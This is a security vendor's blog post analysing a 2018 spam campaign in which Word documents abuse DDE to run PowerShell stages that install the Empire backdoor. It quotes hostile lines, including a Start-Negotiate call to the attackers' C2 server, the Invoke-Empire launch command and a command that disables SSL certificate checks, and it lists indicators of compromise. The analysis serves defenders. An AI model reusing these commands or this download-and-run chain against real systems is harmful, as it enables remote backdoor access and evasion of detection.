Security Now
Security is top-of-mind, especially right here where Juniper experts share their insights on the latest security trends and breakthroughs
paulkimayong , Visitor
Security Now
Macro-less Document and Fileless Malware: the perfect cloaking mechanism for new threats
01.29.18

Overview

At the onset of the discovery of DDE command execution attacks in October, Juniper Threat Labs discovered a series of spam messages using this technique. The Dynamic Data Exchange (DDE) is a protocol or feature in MSWord and MSExcel for sharing data between applications. Security researchers discovered that this feature can be abused to gain command executionBelow are some of the spam campaigns that Cyphort has detected that arose from this discovery. 

 

IRS Spam campaign. Sha256 of doc: 0cfab9a3365f4aabaabca4f31206d1c2d8cf82608c46af9b39d37a0936923987IRS Spam campaign. Sha256 of doc: 0cfab9a3365f4aabaabca4f31206d1c2d8cf82608c46af9b39d37a0936923987

 

Efax spam campaign. Docx Sha256: a1a4dbb3e8edbc1e49f16c9183ba9b70125e671c94edd10b5552b7ba365da541Efax spam campaign. Docx Sha256: a1a4dbb3e8edbc1e49f16c9183ba9b70125e671c94edd10b5552b7ba365da541

 

RBC Secure spam campaign. Docx sha256: 9de0e9ac4bf682a965f3240a0d3353173086a31cafaf7dad80889e52ef7b21dcRBC Secure spam campaign. Docx sha256: 9de0e9ac4bf682a965f3240a0d3353173086a31cafaf7dad80889e52ef7b21dc

 

In one example, a malicious file launches several stages of powershell scripts in memory. The attack is fileless (aside from the doc) as it did not need to write anything on the disk and it involves only powershell scripts running in the memory. The communication to the C2 server is also through SSL, which makes this threat harder to detect. The final payload is an open source powershell backdoor called “Empire”.

 

Infection chainInfection chain

Stage 1

During our research, we identified the following malware.

File Name: Pelan Strategik PRU14 - 2.docx

Sha256: befed4808484c9d9143c55e0977779aaae114a47def832a1837f3e78775e90c8

The filename translates to Malaysian as “Strategic Plan PRU14 - 2.docx”.

 

Opening this file shows nothing (blank document) except for a message box to enable the “DDE”. We would need to click on the object to be able to trigger the DDE. Inside a docx file is “Document.xml” where we can find how the DDE will behave. We can easily spot the DDE with keywords “DDE” and “DDEAUTO,” although in some cases this can be obfuscated by padding xml tags in between letters. In this example, the DDEAUTO can be easily spotted.

document.xmldocument.xml

The DDEAUTO command is invoking cmd.exe, which executes powershell to download and execute a powershell script (0.ps1) from a Dropbox storage.

 

Stage 2: 0.ps1

 

The downloaded powershell script is base64 encoded as shown by the following powershell process.

 

Process SnapshotProcess Snapshot

After decoding, it will resolve as follows:

 

 ps_code1.png

 

The script will download the next stage of malware via SSL from “https://www(.)thestar(.)live:443/login/process(.)php”. The next stage is encrypted using AES-256. The first four bytes of the downloaded data, along with the constant “505dd62e251005fa796e32e9651b6310,” is used as a key to decrypt the rest of the data, from the 5th byte until the end of data. The “IEX” command at the end is indicative that it will download another powershell script. IEX is a shortcut for “Invoke-Expression” in powershell.

 

The next stage is also hosted on a site with HTTPS access, which likely has some untrusted certificate. It disables SSL certificate check using the following command to avoid displaying a warning popup:

 

 [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};

Stage 3: Empire Loader

The downloaded data is another powershell script. This script will download another script from the same C2 server via SSL. But this time from “/news.php”. The downloaded data is encrypted with AES-256.

ps_code2a.pngps_code2b.png

 

The script will execute the Start-Negotiate function with these parameters:

 

Start-Negotiate -s "https://www[.]thestar[.]live:443" -SK '505dd62e251005fa796e32e9651b6310' -UA 'Mozilla/5.0(WindowsNT6.1;WOW64;Trident/7.0;rv:11.0)likeGecko';

It posts data to "https://www[.]thestar[.]live:443/news.php", which returns encrypted raw data.

 

The IEX command at the end of the function invokes the output of the call to “Decrypt-Bytes” function, which decrypts the raw data returned by the above network connection. The resulting decrypted data is the final payload, “Empire Backdoor”.

 

It will invoke the “Empire Backdoor” using the following command.

 

[GC]::CollecT();Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy;

Payload: Empire - Powershell Backdoor

 

The final payload is a powershell backdoor called “Empire”. This backdoor/tool is publicly available in GitHub, “https://github.com/EmpireProject/Empire” with several modifications from https://github.com/Hackplayers/Empire-mod-Hackplayers.


empire_screenshot.png

 

Based from the description:

“Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent and a pure Python 2.6/2.7 Linux/OS X agent. It is the mergence of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptological and secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premiered at HackMiami 2016.

This does not mean that the creators of the backdoor in GitHub are the same actors behind this attack. It’s almost certain that other malicious actors are using the backdoor and weaponizing it for their own gain.

Looking at the modules, this backdoor is pretty dangerous.



modules_added.png

 

The DDE feature has since been disabled to mitigate malware attacks that involve it, but it took several weeks before Microsoft finally decided to disable it. During that span of time, we have seen several threat actors utilizing this technique for cybercrime activity. It is always  important for people involved in security to stay on top of the current threat landscape.

 

Indicators of Compromise

 

Word Doc

Befed4808484c9d9143c55e0977779aaae114a47def832a1837f3e78775e90c8

Network:

https://dl[.]dropboxusercontent[.]com/s/t505u2gjv9qzn0y/0.ps1

https://www[.]thestar[.]live:443

 

Cyphorts detects this threat as TROJAN_DOWNLOADER.DC

 

cyphort_detection.png

 

Sky ATP also detects this as follows:

 

sky_atp_detections.png

Top Kudoed Authors